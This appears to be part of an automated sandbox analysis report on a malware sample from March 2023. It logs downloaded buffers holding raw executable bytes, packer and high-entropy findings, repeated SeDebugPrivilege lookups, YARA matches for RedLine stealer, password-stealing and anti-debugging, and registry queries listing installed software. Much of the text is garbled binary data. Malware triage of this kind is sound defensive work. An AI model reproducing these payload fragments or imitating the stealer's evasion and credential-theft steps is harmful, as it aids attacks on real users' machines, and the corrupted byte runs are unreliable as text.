8%ÿÿÿ#@(Y(S8Òÿÿÿ(M 8ûþÿÿ#@(7 (Q 8Ýþÿÿ(W 8Ìþÿÿr¤p(E 8·þÿÿ ô(K þ8þÿÿ(O ~/ {R :þÿÿ& 8wþÿÿ{J8}8óÿÿÿ{6}8{ J8} 8óÿÿÿ{6}8{6}8{J8}8óÿÿÿ{J8}8óÿÿÿ{6}8{J8}8óÿÿÿ{J8}8óÿÿÿ{6}8{6}8{6}8{J8}8óÿÿÿ{6}8(ô,.þ (7 &~þ~0U þ8þE8%(] ~/ {0 :Ôÿÿÿ& 8Éÿÿÿ(^8.þ (8 .þ (9 &~þ~0u(8( ~/ {g :& 8 8ÌÿÿÿþE/8s9} ~/ {1 9Ïÿÿÿ& 8Äÿÿÿ0°(ô,8(e request_handle: 0x00cc000c	1	1
InternetReadFile March 30, 2023, 4:28 p.m.	buffer: MZÿÿ@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL:1àVz LÀ+@p4@03Ü@36`Â+ .textTV `.rdataìHpJZ@@.dataøaÀ+z¤+@À.idataÜ030@À.reloc6@3"0@B.symtab`4:1B$ÃÌÌÌÌÌÌÌÌÌÌÌÌ$ÃÌÌÌÌÌÌÌÌÌÌÌÌ$ÃÌÌÌÌÌÌÌÌÌÌÌÌ$ÃÌÌÌÌÌÌÌÌÌÌÌÌ,$ÃÌÌÌÌÌÌÌÌÌÌÌÌ4$ÃÌÌÌÌÌÌÌÌÌÌÌÌ<$ÃÌÌÌÌÌÌÌÌÌÌÌÌÿ Go build ID: "KRDWsDixRX-MQangeTen/_ZNsxysfBeEMxev7CWRu/ff2w_NqwoMqa-UeWzgVn/PGEWwzV4C2U48rRoxD_A" ÿÌÌÌÌÌÌÌÌÌd ;av ìèvD$$D$D$èÄÃèYëÇÌÌÌÌÌÌÌd ;aÒìDD$HL$LëèÙÉúL$D$8$L$ÆD$,è¸D$À}T$81Û1íD$ëT$)ÂJÓ÷ÚÁúh!ÕT$8Õø\|§:cpu.u\$,l$@D$$D$ÆD$=è_D$À%HüL$÷ÙÁùá\$8,l$4t$)Æ~ÿ\|$ß÷ÛßÁÿP!ú<\|$0þuf?onu\þëþuRf?ofuKT:fuBþÂøuf}aluD8lu ìRp1ÉéT$ìRpD$(L$1Ûéèzz1]$ÇD$èôD$0$D$D$èà¯]$ÇD$ èÊD$4$D$D$è¶Sê\$ÇD$è èkz\$,l$@éQþÿÿèùyù·]$ÇD$!èsD$8$D$D$è_Sê\$ÇD$èIèz\$,l$@éúýÿÿìRp èRpÀtD$,1ÒëÄDÃÁ¶Y ¶iq9\|$@yÀtsÛtm¶.ÀudT$(L$<\|$$èPyø}]$ÇD$èÊD$@$D$$D$è¶¿p]$ÇD$è èkyD$,L$<T$(ëB9Ðgÿÿÿé^ÿÿÿ^¶T$9Ã}tÞÁã=èRpT<9ÊuÞt$$\$ <$l$T$èÃ¶D$ÀuD$(L$l$4t$$ë«èRpL$ ÆDèRp¶T$T \$,l$@éÀüÿÿèhx £]$ÇD$èâD$4$D$D$èÎSê\$ÇD$è¸èx\$,l$@éiüÿÿËÁá-èRpÆD -èRpT K9Á\|ß\$,l$@é;üÿÿècéüÿÿÌÌÌÌÌÌÌÌÌÌÌÌÌÌd ;av,D$¶L$T$1ÛëC9Ø~ ,8Muó\$ÃÇD$ÿÿÿÿÃè ë»ÌÌÌÌÌÌÌÌÌÌÌd ;aì,ÀZ$è±D$Ç@ ì\ !ØrHÇ@ ì\H ØrHÇ@$ ì\H "ØrH(Ç@4 Éí\H0 #ØrH8Ç@D Õí\H@ $ØrHHÇ@T Ùí\HP %ØrHXÇ@d î\H` &ØrHhÇ@t "ì\Hp 'ØrHxÇ `] )ØrÇ úó\ ØrÇ¤ ô\ +Ør¨Ç´ î\° ,Ør¸ÇÄ Ëð\À .ØrÈÇÔ Ðð\Ð /ØrØÇä Õð\à -ØrèÇìRpÇðRp àÓrÉuèRpë=èRpè¿Ç$ÇD$èKD$øüD$Ç$ÇD$è&D$èÐrÇ$ÇD$èD$D$ $ÇD$èÀ¶D$,ØrD$ $ÇD$è¡¶D$)ØrD$ $ÇD$è¶D$-ØrD$ $ÇD$èc¶D$.ØrD$ $ÇD$èD¶D$/ØrD$ $ÇD$è%¶D$*ØrD$ $ÇD$è¶D$ ØrD$ $ÇD$èç¶D$(ØrD$ $ÇD$èÈ¶D$Àt ¶(Ørë1À'Ør¶(ØrÀu1Àë?èê$D$(ÇD$è¶D$Àu1ÀëD$($ÇD$èe¶D$D$L$ $ÇD$èH¶D$¶L$!È"ØrD$øÇ$ÇD$èED$D$$$ÇD$èý¶D$$ØrD$$$ÇD$ èÞ¶D$¶L$!Á #ØrD$$$ÇD$è¸¶D$%ØrD$$$ÇD$è¶D$&ØrD$$$ÇD$èz¶D$!ØrÇ$ÇD$è\|$sÄ,ÃÇ$ÇD$èiD$$ÇD$è%¶D$+ØrÄ,ÃÄ,ÃÄ,ÃèÉéÄúÿÿÌÌÌÌd ;avD$L$ÁÀD$ÃèëÕÌÌÌÌÌD$L$¢D$\$L$T$ÃÌÌÌÌÌ¹ÐD$T$ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌd ;avcìD$HT$(9Ju,$\$L$è§¶D$Àu1Àë'D$À$D$ÀD$ÇD$èx¶D$D$ÄÃèÖëÌÌÌÌd ;aìD$ L$1Òë l$UØú}sT$Áâl4< 9kuQT$<$t$l$è request_handle: 0x00cc000c	1	1
InternetReadFile March 30, 2023, 4:28 p.m.	buffer: MZÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÉáÛiii»¦diRichiPELôU]à l0@P÷¤t$(@` ,.text `.datal0@À.rsrc` @0@@×ù¯MMSVBVM60.DLL request_handle: 0x00cc000c	1	1
InternetReadFile March 30, 2023, 4:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr Üà"0 ~¢ À@ `(¢SÀ(à H.text `.rsrc(À@@.relocà@B`¢HÐCX^)C¸.s *þ (< ((< 6{oc F(Y (oI J ²so ¦(p r$pr$p(r$pr$p(oa ¦(q r"$pr&$p(r$pr2$p(oa â~ :(rÖ+pr,p(Ð (U o s ~ ~*~( Vs0( t{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{ "} 0¡( o þþ( 9zs %rprp(o %rprp(þ( o % o % o % o! (" þÝþ9 þo# Ü ($ ~0}(% %~%:&~þ s& %o' %~%:&~þs( %o) ~%:&~þs( %o 0â(+ :¹(, :¯rpr³p((~- (. :r¿prïp((~- (. :ir÷prp((~- (. :Fr#pr?p((~- (. :#rIprwp((~- (. 9rprp((/ ($ 0rpr¯p(þ (0 þ~1 þo2 þþþ 8o3 8o4 9 ($ þþ 8o5 Ýþ9 þo# Ü.Q0' þ þ s6 &þ: ($ 0qs7 þ þ8>þþ þo8 þ þþ o9 ]o8 aÑo: &þ Xþþþ o9 ?°ÿÿÿþo; 0% 8 8X ?èÿÿÿ 8i @i(= 8&8i]X ?âÿÿÿ 8$ XX ] X ?Ñÿÿÿ% i=8NX ] X ] X ] a(> Xi?¨ÿÿÿ0« (? r¹prëp((@ (A rõprùp((B (C rÿprØp(-%ràprp(¢%¢%r(prVp(¢%¢%r^prrp(¢%¢(D sE sF %¢%rpr¦p((((G ¢%r´præp(¢%oH oI ¢(J oK rôprp(rprVp((C oL r^prhp(oH o; oM oN oH oI rvprp(oO Ý 9o# ÜoP (/ Ý*A4®ÚG0'þ(K(G% þ rpr°p((C (&(Q (E ¤% þ r¶prÈp((C ((E ¤% þ rÖprèp((C ((E ¤% þ rîprôp((C (R o; (E ¤% þ rüprp((C ~(E ¤% þ rprp((C ((E ¤% þ r pr8p((C ((E ¤% þ r@prHp((C ( (E ¤% þ rRprZp((C (!(E ¤% þ rdprlp((C (#(E ¤% þ rrpr\|p((C ("(E ¤% þ rprp((C ($(E ¤% þ r¤pr°p((C (%(E ¤% þ r¶prÞp((C (S ( (T (E ¤(I Ð(U rêprøp(s sV sW oX (Y o; oM Ý9o# Ü( =sZ o[ ( s\ ~o] o^ Ý9o# Ü(_ rprp(oM iiX iX=i(= ii(= iiX i(= 9&_´0~rpr(p(r2prs p(ry pr× p(rß prõ p(rý pr p( r pr¤#p((J *0v(< r²#pr¾#p((` rÊ#p request_handle: 0x00cc000c	1	1
InternetReadFile March 30, 2023, 4:29 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL©5$dà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000ef200', u'virtual_address': u'0x0000c000', u'entropy': 7.954532188370386, u'name': u'.rsrc', u'virtual_size': u'0x000f0000'}

entropy

7.95453218837

description

A section with a high entropy has been found

entropy

0.967138523761

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (16 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 30, 2023, 4:27 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 30, 2023, 4:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (11 events)

description	Communications smtp	rule	Network_SMTP_dotNet
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	RedLine stealer	rule	RedLine_Stealer_m_Zero

Queries for potentially installed applications (50 out of 153 events)

Time & API	Arguments	Status
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000398 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: 7-Zip base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: AddressBook base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: Adobe AIR base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: Connection Manager base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: EditPlus base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: Fontcore base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: Google Chrome base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: IE40 base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: IE4Data base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: IE5BAKEX base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: IEData base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: MobileOptionPack base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: Office15.PROPLUSR base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: SchedulingAgent base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: WIC base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
